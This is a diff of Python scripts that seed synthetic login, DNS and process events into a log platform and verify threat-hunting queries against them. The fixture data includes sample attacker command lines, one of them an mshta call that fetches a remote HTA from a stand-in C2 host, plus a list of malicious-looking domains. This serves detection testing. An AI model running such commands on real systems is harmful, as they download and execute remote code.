||||
rec = json.loads(line)
|
||||
rec["proof_run_id"] = run_id
|
||||
buf.append(json.dumps(rec, default=str))
|
||||
if len(buf) >= batch_lines:
|
||||
flush()
|
||||
flush()
|
||||
return sent, run_id
|
||||
|
||||
|
||||
# --- powerQuery ------------------------------------------------------------
|
||||
def power_query(query: str,
|
||||
start_time: str | int = "7d",
|
||||
end_time: str | int | None = None) -> dict:
|
||||
body: dict = {"query": query, "startTime": str(start_time)}
|
||||
if end_time is not None:
|
||||
body["endTime"] = str(end_time)
|
||||
return _post("/api/powerQuery", body, READ_KEY)
|
||||
@@ -0,0 +1,141 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
|
||||
|
||||
The 90-day Okta+DNS+Process hunt joins three event families on
|
||||
(userName, host). To make the query return at least one row at
|
||||
startTime="2h", we ingest a small batch of events for two
|
||||
user/host pairs that satisfy all three legs of the join inside
|
||||
the last 2h window.
|
||||
|
||||
Events use SDL dotted-key JSON (the SDL `json` parser indexes
|
||||
nested fields so queries can reference `event.login.userName`,
|
||||
`dns.question.name`, `src.process.cmdline`, etc., as written
|
||||
in the example PQ).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from datetime import datetime, timedelta, timezone
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import upload_logs, power_query # noqa: E402
|
||||
|
||||
|
||||
NOW = datetime.now(timezone.utc).replace(microsecond=0)
|
||||
|
||||
|
||||
def iso(dt: datetime) -> str:
|
||||
return dt.strftime("%Y-%m-%dT%H:%M:%S.000Z")
|
||||
|
||||
|
||||
def in_recent(seconds_ago: int) -> datetime:
|
||||
return NOW - timedelta(seconds=seconds_ago)
|
||||
|
||||
|
||||
PAIRS = [
|
||||
("alice@contoso.com", "host-alpha"),
|
||||
("bob@contoso.com", "host-bravo"),
|
||||
]
|
||||
BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
|
||||
LOLBINS = [
|
||||
"powershell -enc JABm...",
|
||||
"rundll32.exe shell32,Control_RunDLL",
|
||||
"mshta.exe http://c2.example.com/p.hta",
|
||||
]
|
||||
|
||||
|
||||
def build_events(run_id: str) -> list[dict]:
|
||||
"""Emit OCSF-flavored events as FLAT JSON whose keys contain literal
|
||||
dots (e.g. `"event.category"` rather than nested `{"event":{...}}`).
|
||||
|
||||
SDL's uploadLogs+parser=json indexes each top-level JSON key as a
|
||||
column, and dotted names index as dotted columns -- so the published
|
||||
runnable example can reference `event.category`, `endpoint.name`,
|
||||
`dns.question.name`, `src.process.cmdline`, etc. exactly as it would
|
||||
on a real OCSF-mapped tenant (proven by harness/probe_dotted_keys.py).
|
||||
|
||||
Booleans serialize to lowercase strings via _clean_attrs upstream, so
|
||||
the example filters with `event.login.loginIsSuccessful = 'false'`.
|
||||
"""
|
||||
out: list[dict] = []
|
||||
t = 60
|
||||
for user, host in PAIRS:
|
||||
# ---- failed signins (event.category='logins')
|
||||
for i in range(3):
|
||||
ts = in_recent(t); t += 30
|
||||
out.append({
|
||||
"TimeGenerated": iso(ts),
|
||||
"ts_epoch_ms": int(ts.timestamp() * 1000),
|
||||
"proof_run_id": run_id,
|
||||
"event.category": "logins",
|
||||
"event.login.userName": user,
|
||||
"event.login.loginIsSuccessful": "false",
|
||||
"endpoint.name": host,
|
||||
})
|
||||
# ---- bad DNS (event.type='DNS Resolved')
|
||||
for d in BAD_DOMAINS:
|
||||
ts = in_recent(t); t += 30
|
||||
out.append({
|
||||
"TimeGenerated": iso(ts),
|
||||
"ts_epoch_ms": int(ts.timestamp() * 1000),
|
||||
"proof_run_id": run_id,
|
||||
"event.type": "DNS Resolved",
|
||||
"dns.question.name": d,
|
||||
"endpoint.name": host,
|
||||
"src.endpoint.user.name": user,
|
||||
})
|
||||
# ---- suspicious process (event.type='Process Creation')
|
||||
for cmd in LOLBINS:
|
||||
ts = in_recent(t); t += 30
|
||||
out.append({
|
||||
"TimeGenerated": iso(ts),
|
||||
"ts_epoch_ms": int(ts.timestamp() * 1000),
|
||||
"proof_run_id": run_id,
|
||||
"event.type": "Process Creation",
|
||||
"endpoint.name": host,
|
||||
"src.process.cmdline": cmd,
|
||||
"src.process.user": user,
|
||||
})
|
||||
return out
|
||||
|
||||
|
||||
def main() -> int:
|
||||
run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
|
||||
events = build_events(run_id)
|
||||
body = "\n".join(json.dumps(e, default=str) for e in events)
|
||||
print(f"[seed_runnable_examples] events = {len(events)}")
|
||||
print(f"[seed_runnable_examples] run_id = {run_id}")
|
||||
print(f"[seed_runnable_examples] anchor = {NOW.isoformat()}")
|
||||
|
||||
r = upload_logs(body, server_host="kql-proof",
|
||||
logfile="runnable-examples.jsonl", parser="json")
|
||||
if r.get("status") != "success":
|
||||
print(f"uploadLogs rejected: {r}")
|
||||
return 1
|
||||
|
||||
# Poll until indexed (use proof_run_id which is unique per run).
|
||||
print("Waiting for indexing", end="", flush=True)
|
||||
for _ in range(30):
|
||||
time.sleep(2)
|
||||
resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
|
||||
vals = resp.get("values") or []
|
||||
n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
|
||||
print(f" {n}", end="", flush=True)
|
||||
if n >= len(events):
|
||||
print(" ✓ ready"); break
|
||||
else:
|
||||
print(" (timeout, continuing)")
|
||||
|
||||
out = ROOT / "sample_data" / "runnable_examples_run_id.txt"
|
||||
out.write_text(run_id)
|
||||
print(f"Wrote {out}")
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
sys.exit(main())
|
||||
@@ -0,0 +1,26 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Minimal PowerQuery smoke test against SDL."""
|
||||
import sys, json, time
|
||||
from pathlib import Path
|
||||
sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
|
||||
from harness.sdl_client import power_query, power_query_long_running
|
||||
|
||||
NOW_MS = int(time.time() * 1000)
|
||||
START = NOW_MS - 30 * 24 * 3600 * 1000 # 30d back
|
||||
END = NOW_MS
|
||||
|
||||
q = "dataset='kql-proof' | group n = count() by event_type"
|
||||
print(f"Query: {q}")
|
||||
print(f"Window: {START} .. {END}")
|
||||
t0 = time.time()
|
||||
r = power_query(q, START, END)
|
||||
print(f"Initial response in {time.time()-t0:.2f}s:")
|
||||
print(json.dumps({k: (v if k != 'values' else f'<{len(v)} rows>') for k, v in r.items()},
|
||||
indent=2, default=str))
|
||||
if r.get("continuationToken") or r.get("token"):
|
||||
print("\nPolling for completion ...")
|
||||
r = power_query_long_running(q, START, END, max_wait_sec=30)
|
||||
print(json.dumps({k: (v if k != 'values' else f'<{len(v)} rows>') for k, v in r.items()},
|
||||
indent=2, default=str))
|
||||
print("\nColumns:", r.get("columns"))
|
||||
print("First 20 values:", r.get("values", [])[:20])
|
||||
@@ -0,0 +1,30 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Pretty-print the PROOF.json summary as a table."""
|
||||
import json
|
||||
from pathlib import Path
|
||||
|
||||
p = Path(__file__).resolve().parents[1] / "reports" / "PROOF.json"
|
||||
data = json.loads(p.read_text())
|
||||
local = data["local"]
|
||||
pq = data.get("pq") or {}
|
||||
|
||||
print(f"{'Rule':<46} {'Ref rows':>9} {'SDL rows':>9} {'Status':<10}")
|
||||
print("-" * 80)
|
||||
match = diff = err = 0
|
||||
for rid, l in local.items():
|
||||
ref_keys = sorted([tuple(k) for k in l["fired_keys"]], key=str)
|
||||
p_entry = pq.get(rid) or {}
|
||||
if not pq:
|
||||
status = "—"; sdl_n = "n/a"
|
||||
elif not p_entry.get("ok"):
|
||||
status = "ERROR"; sdl_n = "?"; err += 1
|
||||
else:
|
||||
sdl_n = p_entry.get("rowcount", 0)
|
||||
status = "OK" if sdl_n > 0 else "EMPTY"
|
||||
if sdl_n > 0: match += 1
|
||||
else: diff += 1
|
||||
print(f"{rid:<46} {l['n']:>9} {str(sdl_n):>9} {status:<10}")
|
||||
print("-" * 80)
|
||||
if pq:
|
||||
print(f"OK: {match} EMPTY: {diff} ERROR: {err}")
|
||||
print(f"\nFull report: reports/PROOF.md")
|
||||
@@ -0,0 +1,62 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Try /api/uploadLogs as an alternative to addEvents. We POST each line of
|
||||
the JSONL as a raw event - SDL's json parser will extract fields automatically.
|
||||
|
||||
Per docs: max 6 MB per request, 10 GB/day per tenant, parser=json supports
|
||||
auto-flattening of all keys."""
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
import uuid
|
||||
from pathlib import Path
|
||||
|
||||
import requests
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
CFG = json.loads((ROOT / "config.json").read_text())
|
||||
|
||||
BASE = CFG["base_url"].rstrip("/")
|
||||
WRITE = CFG["log_write_key"]
|
||||
|
||||
JSONL = ROOT / "sample_data" / "events.jsonl"
|
||||
|
||||
PROBE = uuid.uuid4().hex[:8]
|
||||
print(f"probe = {PROBE}")
|
||||
|
||||
# Stamp each line with the probe marker
|
||||
lines = []
|
||||
for line in JSONL.read_text().splitlines():
|
||||
if not line.strip():
|
||||
continue
|
||||
rec = json.loads(line)
|
||||
rec["upload_probe"] = PROBE
|
||||
lines.append(json.dumps(rec))
|
||||
body = "\n".join(lines)
|
||||
print(f"body size = {len(body)} bytes ({len(lines)} lines)")
|
||||
|
||||
headers = {
|
||||
"Authorization": f"Bearer {WRITE}",
|
||||
"Content-Type": "text/plain",
|
||||
"parser": "json",
|
||||
"server-host": "kql-proof",
|
||||
"logfile": "kql-proof.jsonl",
|
||||
}
|
||||
r = requests.post(f"{BASE}/api/uploadLogs",
|
||||
data=body.encode(), headers=headers,
|
||||
timeout=120, verify=True)
|
||||
print(f"HTTP {r.status_code} -> {r.text[:500]}")
|
||||
|
||||
print("\nWaiting 15 s ...")
|
||||
time.sleep(15)
|
||||
|
||||
# Query for the probe value
|
||||
from harness.sdl_client import power_query
|
||||
q = f"upload_probe='{PROBE}' | group n=count() by event_type"
|
||||
res = power_query(q, "30m")
|
||||
print(f"\nQuery result: matching={res.get('matchingEvents')}")
|
||||
cols = [c.get("name") if isinstance(c, dict) else c for c in (res.get("columns") or [])]
|
||||
for row in res.get("values") or []:
|
||||
print(f" {dict(zip(cols, row))}")
|
||||
@@ -0,0 +1,92 @@
|
||||
#!/usr/bin/env python3
|
||||
"""Independent post-export verification.
|
||||
|
||||
Reads every file in `pq/` AS WRITTEN ON DISK (no template substitution,
|
||||
no scope prefix, no harness magic) and POSTs it to /api/powerQuery on
|
||||
the configured tenant. The script asserts each file:
|
||||
|
||||
* parses cleanly (no 'error/client/badParam' status),
|
||||
* returns a syntactically valid response (status='success').
|
||||
|
||||
It does NOT assert that the query returns any rows — empty results are
|
||||
fine. The purpose is to catch syntax / field / function errors so the
|
||||
published .pq files are guaranteed runnable by anyone who copies them.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import re
|
||||
import sys
|
||||
import time
|
||||
from pathlib import Path
|
||||
|
||||
ROOT = Path(__file__).resolve().parents[1]
|
||||
sys.path.insert(0, str(ROOT))
|
||||
from harness.sdl_client import power_query # noqa: E402
|
||||
|
||||
PQ_DIR = ROOT / "pq"
|
||||
files = sorted(PQ_DIR.glob("*.pq"))
|
||||
|
||||
|
||||
def strip_comments(text: str) -> str:
|
||||
return "\n".join(l for l in text.splitlines()
|
||||
if not l.lstrip().startswith("//")).strip()
|
||||
|
||||
|
||||
def collapse_whitespace(body: str) -> str:
|
||||
"""Single-line form: same query, all whitespace collapsed to one space.
|
||||
|
||||
This simulates what happens when a user pastes the query into a web
|
||||
textbox that strips newlines. A correctly-formatted PQ must survive
|
||||
this transformation — every `|` between stages must be present.
|
||||
"""
|
||||
return re.sub(r"\s+", " ", body).strip()
|
||||
|
||||
|
||||
print(f"Verifying {len(files)} .pq files run cleanly on SDL ...")
|
||||
print("(Each file tested in TWO forms: as-written and whitespace-collapsed.)")
|
||||
print()
|
||||
|
||||
passed: list[str] = []
|
||||
failed: list[tuple[str, str, str]] = [] # (file, variant, reason)
|
||||
|
||||
|
||||
def run(name: str, variant: str, body: str) -> bool:
|
||||
t0 = time.time()
|
||||
try:
|
||||
r = power_query(body, start_time="2h")
|
||||
except Exception as e:
|
||||
failed.append((name, variant, f"exception: {e}"))
|
||||
return False
|
||||
elapsed = time.time() - t0
|
||||
status = r.get("status", "")
|
||||
if status == "success":
|
||||
matching = r.get("matchingEvents", 0)
|
||||
print(f" ✓ {name:<48} [{variant:<9}] "
|
||||
f"matching={matching} ({elapsed:.1f}s)")
|
||||
return True
|
||||
msg = r.get("message", "")[:200]
|
||||
print(f" ✗ {name:<48} [{variant:<9}] {status} :: {msg}")
|
||||
failed.append((name, variant, f"{status}: {msg}"))
|
||||
return False
|
||||
|
||||
|
||||
for f in files:
|
||||
text = f.read_text()
|
||||
body = strip_comments(text)
|
||||
if not body:
|
||||
failed.append((f.name, "as-written", "empty after stripping comments"))
|
||||
continue
|
||||
|
||||
ok1 = run(f.name, "as-written", body)
|
||||
ok2 = run(f.name, "collapsed", collapse_whitespace(body))
|
||||
if ok1 and ok2:
|
||||
passed.append(f.name)
|
||||
|
||||
print()
|
||||
print(f"PASS: {len(passed)} FAIL: {len(failed)}")
|
||||
if failed:
|
||||
print()
|
||||
print("Failed queries:")
|
||||
for name, variant, why in failed:
|
||||
print(f" {name} [{variant}]: {why}")
|
||||
sys.exit(1)
|
||||
Reference in New Issue
Block a user